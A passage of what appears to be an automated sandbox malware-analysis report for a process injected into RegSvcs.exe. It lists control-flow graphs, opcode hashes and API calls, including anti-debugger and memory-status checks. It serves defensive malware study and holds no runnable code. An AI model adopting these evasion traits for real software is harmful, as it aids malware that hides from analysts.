2062->2036 2072 6a555ed 2062->2072 2063->2050 2065 6a558db-6a558de 2063->2065 2067 6a558e0-6a558f1 2065->2067 2068 6a558fc-6a558fe 2065->2068 2067->2040 2076 6a558f7 2067->2076 2069 6a55905-6a55908 2068->2069 2070 6a55900 2068->2070 2069->2010 2073 6a5590e-6a55917 2069->2073 2070->2069 2072->2063 2076->2068 2096 6a55850-6a55857 2095->2096 2097 6a557a2-6a557c5 2095->2097 2096->2094 2098 6a55859-6a5588c 2096->2098 2106 6a557cd-6a557d5 2097->2106 2110 6a55891-6a558be 2098->2110 2111 6a5588e 2098->2111 2108 6a557d7 2106->2108 2109 6a557da-6a5581b 2106->2109 2108->2109 2119 6a55833-6a55844 2109->2119 2120 6a5581d-6a5582e 2109->2120 2110->2073 2111->2110 2119->2073 2120->2073
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4520594546.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_6a50000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $
                                            • API String ID: 0-3993045852
                                            • Opcode ID: 8c77019808940e2829f8a1029da30d1cd764766709f7a53b7e825b477da80636
                                            • Instruction ID: e62bf6319cd2339426eb39aac210f6f67f84da3d4506a17e6b4ebea5ad7ed4ad
                                            • Opcode Fuzzy Hash: 8c77019808940e2829f8a1029da30d1cd764766709f7a53b7e825b477da80636
                                            • Instruction Fuzzy Hash: 5222B171E002199FDF64EFA5C4906AEB7B2FF89320F258469D809AF354DA35DC42CB91
                                            Function 02F370B8 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                            Download Yara Rule
                                            APIs
                                            • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 02F3712F
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4515309497.0000000002F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_2f30000_RegSvcs.jbxd
                                            Similarity
                                            • API ID: CheckDebuggerPresentRemote
                                            • String ID:
                                            • API String ID: 3662101638-0
                                            • Opcode ID: 918b6f73817dbfe13f2ed658a3a9596a6001519ff458cbabd86d9c5889f3df0c
                                            • Instruction ID: ea62b03309e9886595eb3bf505ce41005c92c62515c826b16ededfec984bc903
                                            • Opcode Fuzzy Hash: 918b6f73817dbfe13f2ed658a3a9596a6001519ff458cbabd86d9c5889f3df0c
                                            • Instruction Fuzzy Hash: 362137B2D002598FDB10DFAAD884BEEFBF4AF49310F14845AE459A3250D778A944CFA1
                                            Function 06A56630 Relevance: .8, Instructions: 824COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4520594546.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_6a50000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8f1fc9fbd3e77762b362d5891e93a282a30446a796c90bab0be4483331144054
                                            • Instruction ID: 637df5f27212af3534fa152f46e2d45657b0014897b648d4c881f05782924d32
                                            • Opcode Fuzzy Hash: 8f1fc9fbd3e77762b362d5891e93a282a30446a796c90bab0be4483331144054
                                            • Instruction Fuzzy Hash: FB62A130B002059FDB54EB68D594AADB7F2FF84314F658469E806EB361DB35EC86CB90
                                            Function 06A5C1C8 Relevance: .6, Instructions: 650COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4520594546.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_6a50000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 542355c6114d94d16103bde54c4bd6feab57c3d49f0e0a7ba43bb0dbb174fafb
                                            • Instruction ID: a5c0842bdf63f10a4dc737e0b987a0972880402c206cdbcdefb9e2233f9eb7a1
                                            • Opcode Fuzzy Hash: 542355c6114d94d16103bde54c4bd6feab57c3d49f0e0a7ba43bb0dbb174fafb
                                            • Instruction Fuzzy Hash: 9032C774B102059FDB54EF68D980BADB7B2FB48320F218529E906DB355DB39DC82CB91
                                            Function 06A5B278 Relevance: .6, Instructions: 574COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4520594546.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_6a50000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 33e91308d3a812812423f3d446c613b8b1eb3cdff2982e37a150bb46a7ec0ed4
                                            • Instruction ID: 8712d04f259939e31b15a6ca3367e3a9d2013614837e01e27e464598df8883e3
                                            • Opcode Fuzzy Hash: 33e91308d3a812812423f3d446c613b8b1eb3cdff2982e37a150bb46a7ec0ed4
                                            • Instruction Fuzzy Hash: 0B227274E101099BDF64EB69D4A07AEB7B2FB49311F218825E809DF391DB38DC81CB61
                                            Function 06A5AD20 Relevance: 10.4, Strings: 8, Instructions: 393COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 0 6a5ad20-6a5ad3e 1 6a5ad40-6a5ad43 0->1 2 6a5ad45-6a5ad61 1->2 3 6a5ad66-6a5ad69 1->3 2->3 4 6a5ad83-6a5ad86 3->4 5 6a5ad6b-6a5ad7e 3->5 7 6a5ad97-6a5ad9a 4->7 8 6a5ad88-6a5ad8c 4->8 5->4 11 6a5adb4-6a5adb7 7->11 12 6a5ad9c-6a5ada5 7->12 9 6a5ad92 8->9 10 6a5af4c-6a5af56 8->10 9->7 16 6a5adb9-6a5adc6 11->16 17 6a5adcb-6a5adce 11->17 14 6a5af57-6a5af65 12->14 15 6a5adab-6a5adaf 12->15 25 6a5af04-6a5af33 14->25 26 6a5af67-6a5af8e 14->26 15->11 16->17 19 6a5add0-6a5add9 17->19 20 6a5adde-6a5ade1 17->20 19->20 22 6a5ade3-6a5ade8 20->22 23 6a5adeb-6a5adee 20->23 22->23 27 6a5adf4-6a5adf6 23->27 28 6a5af3d-6a5af46 23->28 54 6a5af3a 25->54 29 6a5af90-6a5af93 26->29 30 6a5adfd-6a5ae00 27->30 31 6a5adf8 27->31 28->10 28->12 34 6a5af95 call 6a5b278 29->34 35 6a5afa2-6a5afa5 29->35 30->1 32 6a5ae06-6a5ae2a 30->32 31->30 53 6a5ae30-6a5ae3f 32->53 32->54 39 6a5af9b-6a5af9d 34->39 36 6a5b20e-6a5b211 35->36 37 6a5afab-6a5afe6 35->37 41 6a5b213-6a5b21d 36->41 42 6a5b21e-6a5b221 36->42 50 6a5afec-6a5aff8 37->50 51 6a5b1d9-6a5b1ec 37->51 39->35 44 6a5b244-6a5b247 42->44 45 6a5b223-6a5b23f 42->45 47 6a5b249-6a5b24d 44->47 48 6a5b258-6a5b25a 44->48 45->44 47->37 52 6a5b253 47->52 55 6a5b261-6a5b264 48->55 56 6a5b25c 48->56 64 6a5b018-6a5b05c 50->64 65 6a5affa-6a5b013 50->65 57 6a5b1ee 51->57 52->48 67 6a5ae57-6a5ae92 call 6a565e0 53->67 68 6a5ae41-6a5ae47 53->68 54->28 55->29 61 6a5b26a-6a5b274 55->61 56->55 57->36 81 6a5b05e-6a5b070 64->81 82 6a5b078-6a5b0b7 64->82 65->57 84 6a5ae94-6a5ae9a 67->84 85 6a5aeaa-6a5aec1 67->85 69 6a5ae49 68->69 70 6a5ae4b-6a5ae4d 68->70 69->67 70->67 81->82 91 6a5b0bd-6a5b198 call 6a565e0 82->91 92 6a5b19e-6a5b1b3 82->92 87 6a5ae9c 84->87 88 6a5ae9e-6a5aea0 84->88 97 6a5aec3-6a5aec9 85->97 98 6a5aed9-6a5aeea 85->98 87->85 88->85 91->92 92->51 100 6a5aecd-6a5aecf 97->100 101 6a5aecb 97->101 105 6a5af02 98->105 106 6a5aeec-6a5aef2 98->106 100->98 101->98 105->25 107 6a5aef4 106->107 108 6a5aef6-6a5aef8 106->108 107->105 108->105
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4520594546.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_6a50000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                            • API String ID: 0-1273862796
                                            • Opcode ID: 9ec1001d1da2d87ec5ed04e9df72fbcb4a9e9ab754f5cc8c7c10b39fadbd9c09
                                            • Instruction ID: 78fa42a6bcaad90551650cc7e43f6e8d3f5b98e1685b21639e25ae35ff093d55
                                            • Opcode Fuzzy Hash: 9ec1001d1da2d87ec5ed04e9df72fbcb4a9e9ab754f5cc8c7c10b39fadbd9c09
                                            • Instruction Fuzzy Hash: ABE16070F1020A9FCB65EB69D4906AEB7B2FF85304F218629D906DB344DB35DC46CB91
                                            Function 06A5B698 Relevance: 8.0, Strings: 6, Instructions: 470COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4520594546.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_6a50000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $]q$$]q$$]q$$]q$$]q$$]q
                                            • API String ID: 0-3723351465
                                            • Opcode ID: de7eff5fed5a2e61ddb5e19a304990bef29abc775b133a671f8e7498625a8477
                                            • Instruction ID: 9c2f10417d32a3b1d1100dbba2a4dd35e444a81e5c68a66e4cd22aca38eb2e72
                                            • Opcode Fuzzy Hash: de7eff5fed5a2e61ddb5e19a304990bef29abc775b133a671f8e7498625a8477
                                            • Instruction Fuzzy Hash: 08028370E1020A9FDB64EF58D4A06ADB7B2FB45311F22856AE815DF351DB34EC81CBA1
                                            Function 06A59198 Relevance: 5.2, Strings: 4, Instructions: 230COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 424 6a59198-6a591bd 426 6a591bf-6a591c2 424->426 427 6a59a80-6a59a83 426->427 428 6a591c8-6a591dd 426->428 429 6a59a85-6a59aa4 427->429 430 6a59aa9-6a59aab 427->430 436 6a591f5-6a5920b 428->436 437 6a591df-6a591e5 428->437 429->430 432 6a59ab2-6a59ab5 430->432 433 6a59aad 430->433 432->426 434 6a59abb-6a59ac5 432->434 433->432 442 6a59216-6a59218 436->442 438 6a591e7 437->438 439 6a591e9-6a591eb 437->439 438->436 439->436 443 6a59230-6a592a1 442->443 444 6a5921a-6a59220 442->444 455 6a592a3-6a592c6 443->455 456 6a592cd-6a592e9 443->456 445 6a59224-6a59226 444->445 446 6a59222 444->446 445->443 446->443 455->456 461 6a59315-6a59330 456->461 462 6a592eb-6a5930e 456->462 467 6a59332-6a59354 461->467 468 6a5935b-6a59376 461->468 462->461 467->468 473 6a59378-6a59394 468->473 474 6a5939b-6a593a9 468->474 473->474 475 6a593b9-6a59433 474->475 476 6a593ab-6a593b4 474->476 482 6a59435-6a59453 475->482 483 6a59480-6a59495 475->483 476->434 487 6a59455-6a59464 482->487 488 6a5946f-6a5947e 482->488 483->427 487->488 488->482 488->483
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4520594546.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_6a50000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $]q$$]q$$]q$$]q
                                            • API String ID: 0-858218434
                                            • Opcode ID: 1f84594beee15d759d4905d867edbf86487ed6927443bbaf61e70f0a7b9b45ab
                                            • Instruction ID: 7e1593278d1d5206b792258c0b0668ba61010dc9fb68eecdea9c22ac45907c72
                                            • Opcode Fuzzy Hash: 1f84594beee15d759d4905d867edbf86487ed6927443bbaf61e70f0a7b9b45ab
                                            • Instruction Fuzzy Hash: 99912E70B1021A9BDB54DF65D8907AFB7F6BF88204F108569D80DEF344EB349D868B92
                                            Function 06A5CF88 Relevance: 4.5, Strings: 3, Instructions: 799COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 491 6a5cf88-6a5cfa3 492 6a5cfa5-6a5cfa8 491->492 493 6a5d474-6a5d480 492->493 494 6a5cfae-6a5cfb1 492->494 495 6a5d486-6a5d773 493->495 496 6a5d23e-6a5d24d 493->496 497 6a5cfb3-6a5cff5 494->497 498 6a5cffa-6a5cffd 494->498 703 6a5d779-6a5d77f 495->703 704 6a5d99a-6a5d9a4 495->704 501 6a5d25c-6a5d268 496->501 502 6a5d24f-6a5d254 496->502 497->498 499 6a5d046-6a5d049 498->499 500 6a5cfff-6a5d041 498->500 503 6a5d06c-6a5d06f 499->503 504 6a5d04b-6a5d067 499->504 500->499 505 6a5d9a5-6a5d9de 501->505 506 6a5d26e-6a5d280 501->506 502->501 509 6a5d071-6a5d080 503->509 510 6a5d0b8-6a5d0bb 503->510 504->503 521 6a5d9e0-6a5d9e3 505->521 522 6a5d285-6a5d288 506->522 517 6a5d082-6a5d087 509->517 518 6a5d08f-6a5d09b 509->518 512 6a5d104-6a5d107 510->512 513 6a5d0bd-6a5d0ff 510->513 524 6a5d150-6a5d153 512->524 525 6a5d109-6a5d14b 512->525 513->512 517->518 518->505 526 6a5d0a1-6a5d0b3 518->526 530 6a5d9e5-6a5da01 521->530 531 6a5da06-6a5da09 521->531 532 6a5d2d1-6a5d2d4 522->532 533 6a5d28a-6a5d2cc 522->533 534 6a5d155-6a5d197 524->534 535 6a5d19c-6a5d19f 524->535 525->524 526->510 530->531 539 6a5da18-6a5da1b 531->539 540 6a5da0b call 6a5dafd 531->540 537 6a5d2d6-6a5d318 532->537 538 6a5d31d-6a5d31f 532->538 533->532 534->535 542 6a5d1a1-6a5d1b7 535->542 543 6a5d1bc-6a5d1bf 535->543 537->538 549 6a5d326-6a5d329 538->549 550 6a5d321 538->550 551 6a5da1d-6a5da49 539->551 552 6a5da4e-6a5da50 539->552 560 6a5da11-6a5da13 540->560 542->543 556 6a5d1c1-6a5d1c3 543->556 557 6a5d1ce-6a5d1d1 543->557 549->492 561 6a5d32f-6a5d338 549->561 550->549 551->552 562 6a5da57-6a5da5a 552->562 563 6a5da52 552->563 565 6a5d471 556->565 566 6a5d1c9 556->566 567 6a5d1d3-6a5d215 557->567 568 6a5d21a-6a5d21d 557->568 560->539 575 6a5d347-6a5d353 561->575 576 6a5d33a-6a5d33f 561->576 562->521 577 6a5da5c-6a5da6b 562->577 563->562 565->493 566->557 567->568 570 6a5d227-6a5d22a 568->570 571 6a5d21f-6a5d224 568->571 584 6a5d22c-6a5d22e 570->584 585 6a5d239-6a5d23c 570->585 571->570 586 6a5d464-6a5d469 575->586 587 6a5d359-6a5d36d 575->587 576->575 601 6a5dad2-6a5dae7 577->601 602 6a5da6d-6a5dad0 call 6a565e0 577->602 584->561 590 6a5d234 584->590 585->496 585->522 586->565 587->565 606 6a5d373-6a5d385 587->606 590->585 602->601 620 6a5d387-6a5d38d 606->620 621 6a5d3a9-6a5d3ab 606->621 624 6a5d391-6a5d39d 620->624 625 6a5d38f 620->625 626 6a5d3b5-6a5d3c1 621->626 628 6a5d39f-6a5d3a7 624->628 625->628 635 6a5d3c3-6a5d3cd 626->635 636 6a5d3cf 626->636 628->626 639 6a5d3d4-6a5d3d6 635->639 636->639 639->565 640 6a5d3dc-6a5d3f8 call 6a565e0 639->640 650 6a5d407-6a5d413 640->650 651 6a5d3fa-6a5d3ff 640->651 650->586 653 6a5d415-6a5d462 650->653 651->650 653->565 705 6a5d781-6a5d786 703->705 706 6a5d78e-6a5d797 703->706 705->706 706->505 707 6a5d79d-6a5d7b0 706->707 709 6a5d7b6-6a5d7bc 707->709 710 6a5d98a-6a5d994 707->710 711 6a5d7be-6a5d7c3 709->711 712 6a5d7cb-6a5d7d4 709->712 710->703 710->704 711->712 712->505 713 6a5d7da-6a5d7fb 712->713 716 6a5d7fd-6a5d802 713->716 717 6a5d80a-6a5d813 713->717 716->717 717->505 718 6a5d819-6a5d836 717->718 718->710 721 6a5d83c-6a5d842 718->721 721->505 722 6a5d848-6a5d861 721->722 724 6a5d867-6a5d88e 722->724 725 6a5d97d-6a5d984 722->725 724->505 728 6a5d894-6a5d89e 724->728 725->710 725->721 728->505 729 6a5d8a4-6a5d8bb 728->729 731 6a5d8bd-6a5d8c8 729->731 732 6a5d8ca-6a5d8e5 729->732 731->732 732->725 737 6a5d8eb-6a5d904 call 6a565e0 732->737 741 6a5d906-6a5d90b 737->741 742 6a5d913-6a5d91c 737->742 741->742 742->505 743 6a5d922-6a5d976 742->743 743->725
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4520594546.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_6a50000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $]q$$]q$$]q
                                            • API String ID: 0-182748909
                                            • Opcode ID: 41a76d5b3421734714ea16eb4595ed8222463334dea85498ca4a856c023796d5
                                            • Instruction ID: 98aedc6cd57f2d361d1fc6132544ebbe2c2fb1edefde10acc231b04e33ecf4ac
                                            • Opcode Fuzzy Hash: 41a76d5b3421734714ea16eb4595ed8222463334dea85498ca4a856c023796d5
                                            • Instruction Fuzzy Hash: A9626C7070020A9BCB65EB69D580A5DB7F2FF84304F218A29E409DF354DB39ED96CB85
                                            Function 06A547A8 Relevance: 3.9, Strings: 3, Instructions: 186COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 751 6a547a8-6a547cc 752 6a547ce-6a547d1 751->752 753 6a547d7-6a548cf 752->753 754 6a54eb0-6a54eb3 752->754 774 6a548d5-6a54922 call 6a55051 753->774 775 6a54952-6a54959 753->775 755 6a54eb5-6a54ecf 754->755 756 6a54ed4-6a54ed6 754->756 755->756 758 6a54edd-6a54ee0 756->758 759 6a54ed8 756->759 758->752 761 6a54ee6-6a54ef3 758->761 759->758 788 6a54928-6a54944 774->788 776 6a549dd-6a549e6 775->776 777 6a5495f-6a549cf 775->777 776->761 794 6a549d1 777->794 795 6a549da 777->795 791 6a54946 788->791 792 6a5494f 788->792 791->792 792->775 794->795 795->776
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4520594546.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_6a50000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: fbq$XPbq$\Obq
                                            • API String ID: 0-4057264190
                                            • Opcode ID: fec2e3a1af0bff1d9a0db178aae3ae0eedc359c52efe5b7b651fe93967a8abbd
                                            • Instruction ID: e1db72f3de8900a756c22de622e56a3b5bb3591e78f6105a7cba14dd8dcfbca4
                                            • Opcode Fuzzy Hash: fec2e3a1af0bff1d9a0db178aae3ae0eedc359c52efe5b7b651fe93967a8abbd
                                            • Instruction Fuzzy Hash: A5617170F002199FEB54EFA5C8547AEBAF6FB8C710F208429D50AAB395DB758C41CB91
                                            Function 06A5A3F2 Relevance: 2.8, Strings: 2, Instructions: 257COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1698 6a5a3f2-6a5a3f4 1699 6a5a394 1698->1699 1700 6a5a3f7-6a5a3f9 1698->1700 1701 6a5a396 1699->1701 1702 6a5a333-6a5a335 1699->1702 1703 6a5a398-6a5a3ad 1700->1703 1704 6a5a3fb-6a5a3fc 1700->1704 1701->1703 1705 6a5a337 1702->1705 1706 6a5a33c-6a5a33f 1702->1706 1726 6a5a3b2-6a5a3b5 1703->1726 1707 6a5a40f-6a5a420 1704->1707 1708 6a5a3fe-6a5a40e 1704->1708 1705->1706 1709 6a5a345-6a5a34e 1706->1709 1710 6a5a12a-6a5a12d 1706->1710 1712 6a5a422-6a5a425 1707->1712 1708->1707 1713 6a5a12f-6a5a139 1710->1713 1714 6a5a13a-6a5a13d 1710->1714 1715 6a5a427-6a5a435 1712->1715 1716 6a5a440-6a5a443 1712->1716 1720 6a5a143-6a5a16a 1714->1720 1721 6a5a2a8-6a5a2ab 1714->1721 1736 6a5a5d6-6a5a66c call 6a52098 1715->1736 1737 6a5a43b 1715->1737 1717 6a5a574-6a5a577 1716->1717 1718 6a5a449-6a5a476 call 6a52098 1716->1718 1724 6a5a579-6a5a595 1717->1724 1725 6a5a59a-6a5a59d 1717->1725 1781 6a5a47c-6a5a4a1 1718->1781 1782 6a5a569-6a5a573 1718->1782 1775 6a5a174-6a5a181 call 6a52098 1720->1775 1776 6a5a16c-6a5a16f 1720->1776 1722 6a5a2ad-6a5a2c7 1721->1722 1723 6a5a2cc-6a5a2cf 1721->1723 1722->1723 1730 6a5a2d1-6a5a2df 1723->1730 1731 6a5a2ea-6a5a2ed 1723->1731 1724->1725 1732 6a5a5bd-6a5a5c0 1725->1732 1733 6a5a59f-6a5a5b8 1725->1733 1734 6a5a3d7-6a5a3d9 1726->1734 1735 6a5a3b7 1726->1735 1730->1720 1757 6a5a2e5 1730->1757 1742 6a5a30d-6a5a310 1731->1742 1743 6a5a2ef-6a5a308 1731->1743 1744 6a5a5c2-6a5a5cc 1732->1744 1745 6a5a5cd-6a5a5d0 1732->1745 1733->1732 1740 6a5a3e0-6a5a3e3 1734->1740 1741 6a5a3db 1734->1741 1749 6a5a3c3-6a5a3d2 1735->1749 1736->1718 1799 6a5a672-6a5a67c 1736->1799 1737->1716 1752 6a5a3e5-6a5a3e9 1740->1752 1753 6a5a368-6a5a36b 1740->1753 1741->1740 1742->1702 1750 6a5a312-6a5a32e 1742->1750 1743->1742 1745->1736 1755 6a5a67d-6a5a67f 1745->1755 1749->1734 1750->1702 1761 6a5a38d-6a5a390 1753->1761 1762 6a5a36d-6a5a388 1753->1762 1759 6a5a686-6a5a689 1755->1759 1760 6a5a681 1755->1760 1757->1731 1759->1712 1766 6a5a68f-6a5a698 1759->1766 1760->1759 1761->1726 1770 6a5a392 1761->1770 1762->1761 1770->1703 1786 6a5a187-6a5a1c4 1775->1786 1787 6a5a29d-6a5a2a7 1775->1787 1776->1709 1794 6a5a4a3-6a5a4a9 1781->1794 1795 6a5a4ab 1781->1795 1803 6a5a277-6a5a288 call 6a52098 1786->1803 1804 6a5a1ca-6a5a270 call 6a565e0 1786->1804 1798 6a5a4b1-6a5a563 call 6a565e0 call 6a52098 1794->1798 1795->1798 1798->1781 1798->1782 1803->1786 1810 6a5a28e 1803->1810 1804->1803 1810->1787
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4520594546.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_6a50000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: X!@$x!@
                                            • API String ID: 0-2527372166
                                            • Opcode ID: 8b65645b8b4200fa0af5d87728fad7f2da2b2a0de78981281f6db2c2f7fbefe6
                                            • Instruction ID: f5f4e9398e60f91aa12d1c6c208cc8d7ed51faa5a4359b1e48e20ac968a2bf9f
                                            • Opcode Fuzzy Hash: 8b65645b8b4200fa0af5d87728fad7f2da2b2a0de78981281f6db2c2f7fbefe6
                                            • Instruction Fuzzy Hash: E681A431B002059FCF55EBA9E85069DB7F2EF88314F118529EA0AEB750DB35DD46CB90
                                            Function 06A5918A Relevance: 2.7, Strings: 2, Instructions: 166COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1837 6a5918a-6a59194 1838 6a59196-6a591ac 1837->1838 1839 6a591ad-6a591bd 1837->1839 1838->1839 1841 6a591bf-6a591c2 1839->1841 1842 6a59a80-6a59a83 1841->1842 1843 6a591c8-6a591dd 1841->1843 1844 6a59a85-6a59aa4 1842->1844 1845 6a59aa9-6a59aab 1842->1845 1851 6a591f5-6a5920b 1843->1851 1852 6a591df-6a591e5 1843->1852 1844->1845 1847 6a59ab2-6a59ab5 1845->1847 1848 6a59aad 1845->1848 1847->1841 1849 6a59abb-6a59ac5 1847->1849 1848->1847 1857 6a59216-6a59218 1851->1857 1853 6a591e7 1852->1853 1854 6a591e9-6a591eb 1852->1854 1853->1851 1854->1851 1858 6a59230-6a592a1 1857->1858 1859 6a5921a-6a59220 1857->1859 1870 6a592a3-6a592c6 1858->1870 1871 6a592cd-6a592e9 1858->1871 1860 6a59224-6a59226 1859->1860 1861 6a59222 1859->1861 1860->1858 1861->1858 1870->1871 1876 6a59315-6a59330 1871->1876 1877 6a592eb-6a5930e 1871->1877 1882 6a59332-6a59354 1876->1882 1883 6a5935b-6a59376 1876->1883 1877->1876 1882->1883 1888 6a59378-6a59394 1883->1888 1889 6a5939b-6a593a9 1883->1889 1888->1889 1890 6a593b9-6a59433 1889->1890 1891 6a593ab-6a593b4 1889->1891 1897 6a59435-6a59453 1890->1897 1898 6a59480-6a59495 1890->1898 1891->1849 1902 6a59455-6a59464 1897->1902 1903 6a5946f-6a5947e 1897->1903 1898->1842 1902->1903 1903->1897 1903->1898
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4520594546.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_6a50000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $]q$$]q
                                            • API String ID: 0-127220927
                                            • Opcode ID: a9913e961e65b9743fe843b459cc666443df7763b9bb3bdb7701200cf95b2d18
                                            • Instruction ID: 761d114f3273fce1ec30136ad6b48ae8c16f0a963f27a64bd6b9fdb58bdbec8a
                                            • Opcode Fuzzy Hash: a9913e961e65b9743fe843b459cc666443df7763b9bb3bdb7701200cf95b2d18
                                            • Instruction Fuzzy Hash: 25516270B101059FDB55DB79D890BAFB7F6FB88210F108969D809DF384EA349C42CBA2
                                            Function 06A429CF Relevance: 1.6, APIs: 1, Instructions: 138COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 2123 6a429cf-6a429d0 2124 6a429d2-6a42a3e 2123->2124 2125 6a4299c-6a429a1 2123->2125 2131 6a42a40-6a42a46 2124->2131 2132 6a42a49-6a42a50 2124->2132 2126 6a429a7-6a429a9 2125->2126 2127 6a429a3-6a429a5 2125->2127 2129 6a429af-6a429b1 2126->2129 2130 6a429ab-6a429ad 2126->2130 2127->2126 2135 6a429b7-6a429b9 call 6a40cbc 2129->2135 2136 6a429b3-6a429b5 2129->2136 2130->2129 2131->2132 2133 6a42a52-6a42a58 2132->2133 2134 6a42a5b-6a42afa CreateWindowExW 2132->2134 2133->2134 2140 6a42b03-6a42b3b 2134->2140 2141 6a42afc-6a42b02 2134->2141 2149 6a429b9 call 6a429cf 2135->2149 2150 6a429b9 call 6a429d8 2135->2150 2136->2135 2146 6a42b3d-6a42b40 2140->2146 2147 6a42b48 2140->2147 2141->2140 2142 6a429bd-6a429be 2146->2147 2148 6a42b49 2147->2148 2148->2148 2149->2142 2150->2142
                                            APIs
                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06A42AEA
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4520548854.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_6a40000_RegSvcs.jbxd
                                            Similarity
                                            • API ID: CreateWindow
                                            • String ID:
                                            • API String ID: 716092398-0
                                            • Opcode ID: 3bd867d05ebc8ce2a259a433d827396b856ab0795d9e6b33014756b0eeea773c
                                            • Instruction ID: 611bdb3a73588318b0e876e62f1c9cf8e5cffba5f4276e1d73e8726fa025bd21
                                            • Opcode Fuzzy Hash: 3bd867d05ebc8ce2a259a433d827396b856ab0795d9e6b33014756b0eeea773c
                                            • Instruction Fuzzy Hash: 7551D3B1C00309EFDB15DF99D984ADEBBB5FF88350F24812AE818AB210D771A945CF51
                                            Function 02F3F178 Relevance: 1.6, APIs: 1, Instructions: 135COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 2151 2f3f178-2f3f193 2152 2f3f195-2f3f1bc 2151->2152 2153 2f3f1bd-2f3f1d3 2151->2153 2174 2f3f1d5 call 2f3f260 2153->2174 2175 2f3f1d5 call 2f3f178 2153->2175 2156 2f3f1da-2f3f1dc 2157 2f3f1e2-2f3f241 2156->2157 2158 2f3f1de-2f3f1e1 2156->2158 2165 2f3f243-2f3f246 2157->2165 2166 2f3f247-2f3f2d4 GlobalMemoryStatusEx 2157->2166 2170 2f3f2d6-2f3f2dc 2166->2170 2171 2f3f2dd-2f3f305 2166->2171 2170->2171 2174->2156 2175->2156
                                            Memory Dump Source
